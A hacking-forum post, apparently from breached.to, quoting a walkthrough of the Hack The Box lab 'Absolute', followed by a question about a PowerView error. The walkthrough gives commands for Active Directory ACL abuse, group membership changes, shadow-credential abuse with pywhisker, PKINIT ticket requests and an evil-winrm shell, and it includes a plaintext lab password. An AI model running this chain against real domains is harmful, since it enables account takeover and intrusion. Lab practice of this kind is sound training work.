<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=542646#pid542646" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=542646#pid542646" title="RE: Absolute - HTB [Discussion]">#106</a></strong>
</div>
</div>
<span class="post_date"><span title="September 28, 2022, 06:57 AM">10 minutes ago</span> <span class="post_edit" id="edited_by_542646">
<span class="edited_post">(This post was last modified: <span title="September 28, 2022, 06:58 AM">9 minutes ago</span> by <a href="https://breached.to/User-user-htb22">user_htb22</a>.)</span>
</span></span>
</div>
<div class="post_body scaleimages" id="pid_542646">
<blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022, 03:24 AM">3 hours ago</span>)</span>samhub123 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541589#pid541589" rel="nofollow"></a></cite>Here you go,<br>
<br>
First on my windows machine I add the user m.lovegod to the "Network Audit" group.<br>
<br/>
<br/>
<blockquote class="mycode_quote"><cite>Quote:</cite>$dc_domain="absolute.htb"<br/>
<br/>
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"<br/>
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb<br/>
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred</blockquote>
<br/>
The machine resets its AD config very quickly, so as soon as those commands are done from my linux machine I do:<br/>
<blockquote class="mycode_quote"><cite>Quote:</cite>getTGT.py absolute.htb/m.lovegod:&lt;PASS&gt;<br/>
export KRB5CCNAME=&lt;path to generated ccahe file&gt;</blockquote>
<br/>
<blockquote class="mycode_quote"><cite>Quote:</cite>pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"</blockquote>
<br/>
<br/>
From the above command we get a pfx file and a password associated with it.<br/>
<br/>
Then we use the PKINITtools to get a ticket from the pfx file as follows:<br/>
<br/>
<br/>
<blockquote class="mycode_quote"><cite>Quote:</cite>gettgtpkinit.py absolute.htb/winrm_user -cert-pfx &lt;path to pfx file&gt; -pfx-pass &lt;password of pfx file from last step&gt; winrm_user_ccache</blockquote>
<br/>
<br/>
 Then we get the ccache file for winrm_user<br/>
<br/>
then edit the /etc/krb5.conf file to make sure everything is in CAPS. refer to @<a class="mycode_mention" href="https://breached.to/User-meowmeowattack"><span class="rf_elite">meowmeowattack</span></a> post to do that<br/>
<br/>
Use evil-winrm to get a shell<br/>
<br/>
<blockquote class="mycode_quote"><cite>Quote:</cite>evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB</blockquote>
<br/>
<br/>
Then read the user flag on desktop.</br></br></br></blockquote><br/>
what's wrong ?<br/>
<div class="codeblock"><div class="body" dir="ltr"><code>Exception calling "FindAll" with "0" argument(s): "Unknown error (0x80005000)"<br/>
At C:\Users\ff\Desktop\PowerView.ps1:6663 char:20<br/>
+             else { $Results = $ObjectSearcher.FindAll() }<br/>
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br/>
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException<br/>
    + FullyQualifiedErrorId : DirectoryServicesCOMException<br/>
<br/>
Unable to resolve principal: m.lovegod<br/>
At C:\Users\ff\Desktop\PowerView.ps1:8529 char:13<br/>
+             throw "Unable to resolve principal: $PrincipalIdentity"<br/>
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br/>
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException<br/>
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod</code></div></div>
</div>
<div class="post_meta" id="post_meta_542646">
<div class="float_right">
</div>
</div>